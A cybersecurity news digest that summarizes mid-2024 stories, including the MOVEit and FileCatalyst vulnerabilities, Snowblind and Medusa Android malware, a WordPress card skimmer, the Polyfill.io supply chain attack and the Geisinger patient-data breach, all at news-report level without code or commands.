Daily Brief

CISA, along with the FBI and cybersecurity organizations from Australia and Canada, reviewed 172 significant open-source projects for memory safety issues. The report found that over half of these projects use memory-unsafe programming languages, increasing the risk of memory-related errors. Prominent examples include Linux, Tor, Chromium, and MySQL Server, all exhibiting high ratios of memory-unsafe code. Memory-unsafe languages like C and C++ are commonly used due to their performance benefits, despite their potential security risks. CISA advises developers to adopt memory-safe languages such as Rust, Java, and Go for new projects and transitioning existing code to reduce vulnerabilities. Recommendations also include following safe coding practices and implementing continuous security testing methods like static and dynamic analysis and fuzz testing. The report emphasizes the ongoing challenge of balancing performance with security in software development, particularly in critical infrastructure environments.

A critical SQL injection vulnerability (CVE-2024-5276) has been discovered in Fortra FileCatalyst Workflow, a web-based platform for large file transfers. This flaw enables remote, unauthenticated attackers to create admin users and alter data within the application’s database, although it does not allow data theft. The vulnerability was publicly disclosed by Tenable researchers who also released a proof-of-concept exploit demonstrating the attack process. FileCatalyst Workflow versions up to 5.1.6 Build 135 are affected, and users are urged to update to Build 139 to mitigate the risk. The exploit capitalizes on unsanitized user inputs in the 'jobID' parameter, which Tenable's script used to create a new admin user and gain unauthorized access. No active exploitations have been reported yet, but the availability of the public exploit significantly increases the risk of misuse by malicious actors. This disclosure comes after the Clop ransomware gang's previous exploitation of a Fortra product vulnerability, highlighting ongoing risks associated with security flaws in widely used platforms.

A critical vulnerability in Progress Software’s MOVEit Transfer is actively being exploited, necessitating immediate patching. Identified as CVE-2024-5806 with a CVSS score of 9.1, the flaw allows for authentication bypass in the SFTP module. Another related vulnerability, CVE-2024-5805, also impacts MOVEit Gateway, potentially allowing unauthorized server access. Security researchers detail the ability to impersonate any user, significantly increasing the risk of this exploit. Approximately 2,700 instances of MOVEit Transfer are online globally, with the majority in the U.S., U.K., and other major countries. A prior vulnerability was exploited in widespread Cl0p ransomware attacks, highlighting the urgency for updates. The U.S. CISA has disclosed a separate security breach involving Ivanti Connect Secure, showing the broader context of current cybersecurity threats. Progress Software urges users to update affected systems immediately to mitigate potential risks and exposures.

Hackers are targeting a new critical vulnerability in Progress MOVEit Transfer, specifically CVE-2024-5806, allowing authentication bypass in the SFTP module. The flaw was disclosed publicly by the vendor less than a day before the first attack attempts were detected by the Shadowserver Foundation. Current estimates show approximately 2,700 MOVEit Transfer instances are exposed online, predominantly in the US, UK, Germany, Canada, and Netherlands. Technical details of the vulnerability were released by security firm watchTowr, along with proof-of-concept exploit code created by researcher Sina Kheirkhah. Organizations are urged to apply updates and mitigations provided by Progress promptly, as the exploit's details are now public, increasing the risk of further exploitation. Separate vulnerabilities discovered on third-party components used in MOVEit Transfer add complexity and potential security risk, requiring additional interim mitigations such as blocking RDP access. Patches for CVE-2024-5806 have been released in specific MOVEit Transfer versions, and MOVEit Cloud customers have already received automatic updates.

Progress Software unveiled new vulnerabilities in MOVEit Transfer and MOVEit Gateway, both critical in nature. CVE-2024-5805 and CVE-2024-5806 pose a severe threat with a critical 9.1 severity rating, enabling authentication bypass. Researchers at watchTowr detailed how CVE-2024-5806 facilitates two significant types of attacks, affecting file handling and system security. The less severe vulnerability allows forced SMB authentication, potentially affecting systems beyond MOVEit when using similar SSH library configurations. The more severe exploit grants attackers the ability to masquerade as SFTP users, escalating privileges to manipulate files. Attackers can leverage these vulnerabilities for a file-less attack, leaving minimal traces of unauthorized activities. An immediate increase in exploit attempts was observed soon after the public release of these vulnerabilities by watchTowr. Users are urged to apply patches immediately, especially since successful breaches using similar vulnerabilities historically impacted thousands of organizations.

Snowblind malware exploits the 'seccomp' Linux kernel feature in Android to interfere with application security checks and prevent detection. This novel malware technique was uncovered by the mobile app security company Promon, which received a malware sample affecting a Southeast Asian client of i-Sprint. The malware injects a native library to load before the target app's anti-tampering code, using seccomp filters to block and manipulate system calls during security checks. Such manipulation allows the malware to redirect checks to an unmodified version of the application package, thus bypassing security measures like file integrity verification. The technique observed in Snowblind attacks is not widely known or guarded against in the mobile application industry, making it a significant threat. Researchers demonstrated that this type of attack is completely invisible to users and could lead to unauthorized actions such as the leakage of login credentials. Despite the potential severity, the operational footprint and performance impact of Snowblind attacks are minimal, making them hard to detect during usual app operations. Promon suggests that other adversaries could adopt this bypass technique, posing a broad security risk to Android apps handling sensitive data.

Suspected Chinese and North Korean hackers used ransomware in cyberattacks on global government and infrastructure entities from 2021 to 2023. The clusters of cyberattacks have been linked to groups known as ChamelGang and activities associated with state-sponsored entities. Targets included high-profile organizations such as the All India Institute of Medical Sciences and the Presidency of Brazil, leveraging CatB ransomware. Ransomware attacks served multiple purposes: financial gain, operational sabotage, distraction, and evidence destruction. ChamelGang, identified since 2021 and believed to operate from China, uses tools like BeaconLoader, Cobalt Strike, and multiple backdoors for sophisticated attacks. The 2023 incidents involved updated tools for deeper reconnaissance and data exfiltration, indicating evolving tactics and tools. Another set of attacks used encryption tools like Jetico BestCrypt and Microsoft BitLocker, primarily targeting the manufacturing sector in the Americas and Europe. Cybersecurity experts suggest these ransomware operations offer plausible deniability for state actors, blurring lines between pure cybercrime and state-sponsored espionage.

Regulatory pressures are increasing for organizations to secure their software supply chains amidst rising attack risks. The Log4j breach highlighted vulnerabilities in open-source components used widely in software development. Gartner predicts nearly half of all enterprises will face a software supply chain attack by 2025. Security is complex due to global development teams and extensive open source usage. Embracing DevSecOps and applying comprehensive security controls across code repositories, CI/CD pipelines, and infrastructure are key strategies. Generating and managing software bill of materials (SBOMs) are critical for addressing zero-days and vulnerabilities. Policy-as-code and SLSA framework are essential for governance and ensuring the trustworthiness of software artifacts. Continuous discovery and testing are recommended to mitigate risks and secure software supply chains effectively.

Apple has issued a firmware update for AirPods to address a CVE-2024-27867 authentication vulnerability that allowed unauthorized Bluetooth access. The flaw was found across multiple Apple audio products including various AirPods versions, Powerbeats Pro, and Beats Fit Pro. An attacker within Bluetooth range could impersonate a previously paired device, gaining illicit access to eavesdrop on conversations. The vulnerability has been patched through improved state management in the latest firmware updates. Security researcher Jonas Dreßler discovered and reported the flaw, now mitigated in the recent software releases. Additionally, Apple recently fixed a separate issue, categorised as CVE-2024-27812 in visionOS, concerning a DoS logic flaw in the WebKit processing. Ryan Pickren, another researcher, detailed an exploit that could force-render 3D objects in users' environments through ARKit without user interaction, which has also been addressed.

A new type of malware known as the Caesar Cipher Skimmer has been identified targeting WordPress, Magento, and OpenCart CMS platforms. The malware injects malicious code into e-commerce websites to steal credit card and payment information from users during the checkout process. Attackers have modified the WooCommerce plugin’s checkout PHP page for WordPress to capture data discreetly, using techniques that mimic legitimate Google scripts. The skimmer uses Caesar cipher encoding to hide its malicious codes and the external domain hosting the payload, making detection more challenging. Threat actors deploy additional obfuscated scripts named "style.css" and "css.php" to act like HTML style sheets, further evading detection. Some malicious scripts include comments in Russian, indicating the possibility of Russian-speaking individuals behind these attacks. Continuous updates and rigorous security practices for CMS software and plugins are recommended to mitigate potential vulnerabilities and prevent such attacks.

Medusa, an Android banking Trojan, is currently targeting users in seven countries including the US, UK, Canada, France, Italy, Spain, and Turkey. The malware, active since July 2023, utilizes five different botnets for distribution, showing sophisticated coordination among its affiliates. Cybersecurity firm Cleafy noted that the latest versions of Medusa have minimized required permissions and added features like full-screen overlays and remote uninstall capabilities to reduce detection. Initially identified in 2020, Medusa has evolved from primarily targeting Turkish financial institutions to a broader geographical scope, incorporating advanced functionalities like keylogging, SMS reading, and unauthorized financial transactions. The Trojan employs dropper apps disguised as benign updates or utilities, leveraging platforms like Telegram for command-and-control communications, complicating tracking efforts. Recent adaptations include the use of black screen overlays, misleading users about the operational state of their device to facilitate clandestine operations. The trend indicates a deliberate attempt by threat actors to diversify their victim pool and enhance the Trojan’s operational longevity, potentially affecting a larger demographic. Comparisons are drawn with other malware campaigns such as Cerberus and SpyMax, highlighting a persistent rise in sophisticated mobile security threats globally.

Yahoo! Japan will not charge advertisers $189 million due to the detection of fraudulent clicks, acknowledging that these were not from actual human interactions. This decision reflects approximately 1.6% of LY Corporation’s revenue, highlighting significant financial implications for investors. LY Corporation, the parent company formed by the merger of Yahoo! Japan and LINE in 2020, announced improvements in overall ad quality despite the financial hit. Transparency reports revealed a reduction in unapproved advertising materials from over 133.5 million in 2022 to under 97 million in 2023. The number of fraudulent advertiser accounts remained stable, with 7819 detected in 2023 compared to 7893 in the prior year. The challenge of proving that ads are clicked by real humans is a widespread issue in the online advertising industry, affecting major platforms like Google and Reddit. Ad fraud has been a persistent problem, with notable cases and investigations reported dating back to 2004.

Google has blocked ads on sites using Polyfill.io after a supply chain attack post acquisition by a Chinese CDN company. Over 110,000 websites using the JavaScript library from Polyfill.io are redirecting users to malicious sites. Original creator Andrew Betts warned users against using the library, stressing that modern browsers already support needed features. Alternative solutions have been provided by companies like Cloudflare and Fastly following the security concerns. The domain cdn.polyfill.io has been modified to inject malware, redirecting traffic to unwanted sites selectively. Attack avoids detection by not executing in the presence of web analytics and admin users. The attack introduces a broader security concern with potential remote code execution when combined with other exploits like CVE-2024-2961. Continuous risk mitigation efforts are necessary, as highlighted by ongoing threats and vulnerabilities in web security infrastructure.

An Australian study, Project Hakea, conducted by the Crime Commission in New South Wales, has uncovered widespread misuse of tracking devices by organized crime groups and individuals involved in domestic violence. The top 100 buyers of tracking devices, including GPS trackers and Bluetooth trackers like Apple AirTags, were found to be significantly more likely to have a history of violence or connections to organized crime. The study linked these devices to over 20 serious criminal activities since 2016, including murders, kidnappings, and drive-by shootings, highlighting their role in facilitating organized crime. Notably, misuse of tracking devices in domestic violence cases was also a significant finding, with a large percentage of offenders informing victims about the trackers to intimidate or control them. The Crime Commission’s report suggested stricter regulations on the sale of tracking devices and the promotion of their illegal uses to help curb their role in criminal activities. Anti-stalking features in smartphones and calls for more manufacturers to support these protections were also emphasized as necessary steps to mitigate unauthorized tracking. The connection between criminal use of trackers and domestic violence suggests a disturbing trend of technology misuse that necessitates immediate legal and regulatory actions.

Geisinger, a major U.S. healthcare provider, announced that over a million patient records were likely stolen due to a security breach at Microsoft-owned Nuance Communications. The breach was pinpointed to unauthorized access by a former Nuance employee who wasn't promptly deactivated from the system after termination. Sensitive data involved included birth dates, addresses, hospital records, and demographic details; financial information was not reported as stolen. The incident was detected on November 29, and Nuance cut off the ex-employee's access immediately after being alerted by Geisinger. Law enforcement delayed the notification to patients to not compromise the ongoing investigation, resulting in a delay in public disclosure. The accused ex-employee has been arrested and is facing federal charges, although specific charges have not been detailed. This breach is part of a concerning pattern with Nuance, referencing a similar incident in 2018, and raises questions about Microsoft’s overarching security measures given recent related criticisms.